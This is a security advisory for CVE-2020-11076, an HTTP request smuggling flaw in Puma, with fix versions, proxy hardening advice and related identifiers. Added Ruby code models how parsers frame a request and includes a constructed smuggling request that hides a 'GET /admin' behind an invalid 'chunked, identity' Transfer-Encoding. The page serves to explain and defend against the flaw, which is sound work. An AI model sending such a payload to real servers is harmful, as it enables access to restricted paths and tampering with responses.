PT-2020-3713 · Ruby+4 · Puma+4

Zeddyu · Published 2020-05-22 · Updated 2026-03-13 · CVE-2020-11076

CVSS v2.0: 7.8 (High)
Vector: AV:N/AC:L/Au:N/C:N/I:C/A:N
Name of the Vulnerable Software and Affected Versions: Puma versions prior to 3.12.5 (3.x branch); Puma versions prior to 4.3.4 (4.x branch)
Description: The issue lies in Puma's parsing of HTTP requests (Puma is a RubyGem HTTP server for Ruby/Rack applications). By sending a request with an invalid Transfer-Encoding header, an attacker can make Puma and a front-end proxy disagree about where one request ends and the next begins, and thereby smuggle an HTTP response. The impact is on the integrity of information; confidentiality and availability are not affected (CVSS vector C:N/I:C/A:N). The problem has been fixed in Puma 3.12.5 and Puma 4.3.4.
Recommendations: Update Puma 3.x to version 3.12.5 or later and Puma 4.x to version 4.3.4 or later. Where Puma sits behind a reverse proxy, also verify that the proxy rejects requests carrying both Content-Length and Transfer-Encoding, or a Transfer-Encoding value that is not plain "chunked", so that both parsers frame the message the same way.
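As an added illustration of the failure mode described above (this is example code written for this page, not Puma's source and not from the advisory's authors), the Ruby below models three body-framing policies on a raw HTTP/1.1 request: frame_lenient, a reconstruction of the pre-fix behaviour in which only an exact "chunked" value selects chunked framing and any other Transfer-Encoding value is silently ignored in favour of Content-Length; frame_tolerant, an assumed front-end proxy that honours any "chunked" token; and frame_strict, the hardened policy that refuses ambiguous framing. The attack request, the Host value and the /admin path are constructed for the demo.

```ruby
# Added example for CVE-2020-11076 (not Puma's code). Policies modelled:
#   frame_lenient  - exact "chunked" only, otherwise fall back to Content-Length
#                    (reconstruction of the pre-3.12.5 / pre-4.3.4 behaviour)
#   frame_tolerant - assumed front-end that honours any "chunked" token
#   frame_strict   - hardened: TE must be exactly "chunked" and never with CL
class FramingError < StandardError; end

# Split a raw request into [request_line, headers, bytes_after_blank_line].
def split_request(raw)
  head, rest = raw.b.split("\r\n\r\n", 2)
  raise FramingError, "no end of headers" if rest.nil?
  lines = head.split("\r\n")
  request_line = lines.shift
  headers = {}
  lines.each do |line|
    name, value = line.split(":", 2)
    raise FramingError, "bad header line: #{line.inspect}" if value.nil?
    key = name.strip.downcase
    # Repeated fields are joined with a comma, as RFC 7230 allows for list-valued headers.
    headers[key] = headers.key?(key) ? "#{headers[key]}, #{value.strip}" : value.strip
  end
  [request_line, headers, rest]
end

# Decode a chunked body. Returns [decoded_body, unread_bytes_after_the_message].
def read_chunked(rest)
  body = "".b
  loop do
    size_line, rest = rest.split("\r\n", 2)
    raise FramingError, "truncated chunk-size line" if rest.nil?
    begin
      size = Integer(size_line.split(";").first.to_s.strip, 16)
    rescue ArgumentError
      raise FramingError, "bad chunk size: #{size_line.inspect}"
    end
    if size.zero?
      raise FramingError, "missing final CRLF" unless rest.start_with?("\r\n")
      return [body, rest.byteslice(2, rest.bytesize)]
    end
    raise FramingError, "truncated chunk data" if rest.bytesize < size + 2
    body << rest.byteslice(0, size)
    rest = rest.byteslice(size + 2, rest.bytesize)
  end
end

def read_by_content_length(headers, rest)
  length = Integer(headers.fetch("content-length", "0"), 10)
  raise FramingError, "body shorter than Content-Length" if rest.bytesize < length
  [rest.byteslice(0, length), rest.byteslice(length, rest.bytesize)]
end

def te_tokens(headers)
  te = headers["transfer-encoding"]
  te && te.split(",").map { |t| t.strip.downcase }
end

def frame_lenient(raw)
  _, headers, rest = split_request(raw)
  te = headers["transfer-encoding"]
  return read_chunked(rest) if te && te.casecmp("chunked").zero?
  read_by_content_length(headers, rest)
end

def frame_tolerant(raw)
  _, headers, rest = split_request(raw)
  tokens = te_tokens(headers)
  return read_chunked(rest) if tokens && tokens.include?("chunked")
  read_by_content_length(headers, rest)
end

def frame_strict(raw)
  _, headers, rest = split_request(raw)
  tokens = te_tokens(headers)
  return read_by_content_length(headers, rest) if tokens.nil?
  raise FramingError, "Transfer-Encoding together with Content-Length" if headers.key?("content-length")
  raise FramingError, "unsupported Transfer-Encoding: #{headers['transfer-encoding']}" unless tokens == ["chunked"]
  read_chunked(rest)
end

# True when front-end and back-end would cut the first request at different offsets.
def desync?(raw)
  frame_tolerant(raw)[1] != frame_lenient(raw)[1]
rescue FramingError
  false
end

# Constructed attack request (not captured traffic). "chunked, identity" is invalid:
# RFC 7230 requires chunked to be the final coding. The front-end sees one request
# whose single chunk carries the GET; the lenient back-end stops after 4 bytes and
# treats the GET as a second request, whose Content-Length of 7 swallows the trailer.
SMUGGLED = "GET /admin HTTP/1.1\r\nHost: app.example\r\nContent-Length: 7\r\n\r\n".b
CHUNK_SIZE_LINE = format("%x\r\n", SMUGGLED.bytesize).b
ATTACK = [
  "POST /search HTTP/1.1\r\n",
  "Host: app.example\r\n",
  "Content-Length: #{CHUNK_SIZE_LINE.bytesize}\r\n",
  "Transfer-Encoding: chunked, identity\r\n",
  "\r\n",
  CHUNK_SIZE_LINE, SMUGGLED, "\r\n0\r\n\r\n"
].join.b

if __FILE__ == $PROGRAM_NAME
  puts "front-end leftover: #{frame_tolerant(ATTACK)[1].inspect}"
  puts "back-end  leftover: #{frame_lenient(ATTACK)[1].inspect}"
end
```

Run stand-alone, the script shows the front-end consuming the whole message while the back-end is left holding a complete second request beginning with GET /admin; frame_strict raises FramingError on the same bytes because Content-Length and Transfer-Encoding are both present, which is the behaviour the fixed versions are meant to restore.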

Weakness Enumeration

HTTP Request/Response Smuggling

Related Identifiers

ALT-PU-2021-2596
ALT-PU-2023-4271
ALT-PU-2024-7817
BDU:2020-04071
CVE-2020-11076
DLA-2398-1
GHSA-X7JG-6PWG-FX5H
OESA-2021-1169
OPENSUSE-SU-2020:0990-1
OPENSUSE-SU-2020:1001-1
OPENSUSE-SU-2020:1993-1
OPENSUSE-SU-2020:2000-1
OPENSUSE-SU-2024:10589-1
OPENSUSE-SU-2024:11342-1
OPENSUSE-SU-2024:11343-1
OPENSUSE-SU-2024:11830-1
OPENSUSE-SU-2024:11847-1
OPENSUSE-SU-2024:12592-1
OPENSUSE-SU-2024:12900-1
OPENSUSE-SU-2024:13166-1
OPENSUSE-SU-2024:13720-1
OPENSUSE-SU-2024:13721-1
OPENSUSE-SU-2025:15123-1
OPENSUSE-SU-2026:10357-1
SUSE-RU-2020:2072-1
SUSE-SU-2020:1901-1
SUSE-SU-2020:1919-1
SUSE-SU-2020:2060-1
SUSE-SU-2020:3036-1
SUSE-SU-2020:3147-1
SUSE-SU-2020:3160-1
USN-6682-1

Affected Products

Alt Linux
Linuxmint
Puma
Suse
Ubuntu